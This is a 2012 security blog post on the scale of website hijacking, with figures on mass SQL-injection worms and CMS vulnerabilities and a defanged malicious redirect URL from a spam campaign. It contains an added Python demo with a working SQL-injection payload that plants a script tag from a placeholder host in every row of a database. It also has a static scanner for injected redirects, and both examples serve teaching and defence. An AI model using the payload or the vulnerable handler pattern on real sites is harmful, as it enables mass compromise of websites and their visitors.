Thursday, October 18, 2012

Hijacked websites by the numbers

Two weeks ago, I had the chance to give a presentation about the danger of hijacked websites (you can download the presentation in French here). I used the talk to highlight various points which illustrate the extent of the problem.

Some numbers

70% of malicious links were found on hijacked websites in 2011 (Sophos, page 39). In 2012, Google is finding 9,500 new malicious websites every day, most of them hijacked legitimate sites (Google, 2012). The Blackhole exploit kit alone is estimated to be present on several million websites per year (AVG, weekly count).

Nikkju, a web-based worm that used SQL injection to spread, infected about 200,000 websites. Lizamoon, which started propagating in 2010, infected about 1.5 million websites, also via SQL injection.
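To make the mechanism behind these numbers concrete, here is an added example (not code from the original post, and not the payload of any real worm) showing why one unparameterised query is enough to turn a site into a malware distribution point. The profile table, the "edit my bio" handler and the payload host are constructed for illustration; the point is that a single quote and a comment marker move the script tag from one row to every row.

```python
"""Mass injection through SQL injection, demonstrated on an in-memory SQLite
database. Added example, not from the original post or any real worm: the
schema, the handler and the payload host are constructed for illustration."""
import sqlite3

# Constructed payload: the script tag an attacker wants served from every
# page. The host is a placeholder. The closing quote and the "--" comment
# marker are what turn a per-user update into a site-wide one.
PAYLOAD = "<script src=\"hxxp://malicious.example/ur.php\"></script>' -- "


def make_db():
    """Build a throwaway site database with three user profiles."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE profiles (user_id INTEGER PRIMARY KEY, bio TEXT)")
    conn.executemany("INSERT INTO profiles VALUES (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    conn.commit()
    return conn


def update_bio_vulnerable(conn, user_id, bio):
    """The 'edit my profile' handler as found on many hijacked sites:
    user input is concatenated straight into the statement. With the
    payload above the WHERE clause is commented out, so every row is hit."""
    sql = f"UPDATE profiles SET bio = '{bio}' WHERE user_id = {user_id}"
    conn.execute(sql)
    conn.commit()


def update_bio_safe(conn, user_id, bio):
    """Same handler with bound parameters: the input can only ever be a value,
    never part of the statement, so only the caller's own row changes."""
    conn.execute("UPDATE profiles SET bio = ? WHERE user_id = ?", (bio, user_id))
    conn.commit()


def infected_rows(conn):
    """Return the user_ids whose bio now carries a script tag, i.e. the pages
    of the site that would hand the attacker's code to visitors."""
    rows = conn.execute(
        "SELECT user_id FROM profiles WHERE bio LIKE '%<script%' ORDER BY user_id")
    return [r[0] for r in rows]


def demo():
    """Push the same payload through both handlers (as user 2) and return the
    affected rows for each: (vulnerable, parameterised)."""
    bad = make_db()
    update_bio_vulnerable(bad, 2, PAYLOAD)
    good = make_db()
    update_bio_safe(good, 2, PAYLOAD)
    return infected_rows(bad), infected_rows(good)


if __name__ == "__main__":
    vuln, safe = demo()
    print("vulnerable handler, rows now serving the script:", vuln)
    print("parameterised handler, rows now serving the script:", safe)
```

The parameterised handler still stores the text verbatim in the submitter's own row; keeping that from executing in a visitor's browser is the job of output encoding, a separate control. The real worms did the same thing at scale, usually with stacked queries that walked every text column of every table.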

High profile victims

Since the hijacking of websites is mostly automated, websites of all types are getting compromised. Here are some of the high-profile websites that have been hijacked:

The list of hijacked websites includes many governmental websites from all over the world, including the United States.

Vulnerable software

The attack surface of a website is quite large: an attacker can target the CMS, its plugins, administration tools (phpMyAdmin, Plesk, cPanel, tools which should not be publicly accessible), the web server, the FTP server, the DNS server, etc.

I looked at the number of CVEs issued in 2012 for the most popular software platforms in these areas:

WordPress: 14 CVEs for the core, 42 for extensions, including security extensions that are supposed to make WordPress safer.

Joomla: 7 in core

Drupal: 20+ in core

phpMyAdmin: 5 - Gemnet, a security company, was compromised through a vulnerability in phpMyAdmin

If you want some examples of hijacked websites redirecting users to malicious pages, you can take a look at your inbox. Just this morning, I received four similar messages about a fictitious payment sent to me through Intuit:

These pages all redirect to the same malicious page, hxxp://navisiteseparation.net/detects/processing-details_requested.php, which loads a malicious Java applet. Unfortunately, I could not retrieve the content a second time for further analysis.

This is just one of the many spam campaigns that lead visitors to a malicious site.
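When a campaign page like the one above can no longer be fetched, all an analyst has is whatever copy was saved. The following added example (not code from the original post) is a small static triage script that pulls the redirect targets and applet references out of a saved page body without rendering it or executing any script. The sample HTML, the hosts in it and the site name are constructed; the patterns covered (meta refresh, JavaScript location assignment, hidden iframes, applet and Java object tags) are the usual injection forms, not a complete catalogue.

```python
"""Static triage of a suspected hijacked page: list where it sends visitors
and whether it loads a Java applet, without rendering or executing anything.
Added example, not part of the original post. The sample page and the hosts
in it are constructed and defanged with hxxp."""
import re
from html.parser import HTMLParser

# Constructed sample body, in the style of the spam campaign pages above.
SAMPLE_HTML = """
<html><head>
<meta http-equiv="refresh" content="0; url=hxxp://malicious.example/detects/processing.php">
<script>
if (document.referrer.indexOf("mail") != -1) {
  window.location = "hxxp://malicious.example/detects/processing.php";
}
</script>
</head><body>
<iframe src="hxxp://malicious.example/detects/" width="1" height="1" style="visibility:hidden"></iframe>
<applet code="Exploit.class" archive="hxxp://malicious.example/detects/j.jar" width="1" height="1"></applet>
<p>Your payment is being processed.</p>
</body></html>
"""

# location = "...", location.href = '...', location.replace("...");
# the optional window./document./top. prefix is simply part of the text before.
_JS_LOCATION = re.compile(
    r"""location(?:\.href)?\s*(?:=|\.replace\s*\()\s*["']([^"']+)["']""")


def _is_hidden(attrs):
    """True for the 1x1 or display:none iframes injected into hijacked pages."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    try:
        return int(attrs.get("width", "100")) <= 1 and int(attrs.get("height", "100")) <= 1
    except ValueError:
        return False


class HijackScanner(HTMLParser):
    """Collect (kind, target) findings in document order. Tag-based checks run
    on start tags; script bodies are scanned for location assignments."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*(\S+)", a.get("content") or "", re.I)
            if m:
                self.findings.append(("meta-refresh", m.group(1)))
        elif tag == "iframe" and _is_hidden(a):
            self.findings.append(("hidden-iframe", a.get("src") or ""))
        elif tag == "applet":
            self.findings.append(("java-applet", a.get("archive") or a.get("code") or ""))
        elif tag == "object" and "java" in (a.get("type") or "").lower():
            self.findings.append(("java-object", a.get("data") or ""))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            for m in _JS_LOCATION.finditer(data):
                self.findings.append(("js-redirect", m.group(1)))


def scan_page(html):
    """Return the list of (kind, target) findings for one saved page body."""
    p = HijackScanner()
    p.feed(html)
    p.close()
    return p.findings


def external_hosts(findings, site_host):
    """Hosts other than the site's own that the page hands visitors to:
    the indicators worth blocking or pivoting on."""
    hosts = set()
    for _kind, target in findings:
        m = re.match(r"(?:hxxps?|https?)://([^/]+)", target, re.I)
        if m and m.group(1).lower() != site_host.lower():
            hosts.add(m.group(1).lower())
    return hosts


if __name__ == "__main__":
    found = scan_page(SAMPLE_HTML)
    for kind, target in found:
        print(f"{kind:14} {target}")
    print("external hosts:", sorted(external_hosts(found, "victim.example")))
```

Run it over the body saved with curl or wget rather than a browser copy, and save with the same User-Agent and Referer the victim would have had: as the constructed script shows, campaign pages often only redirect when they think the visitor arrived from the mail.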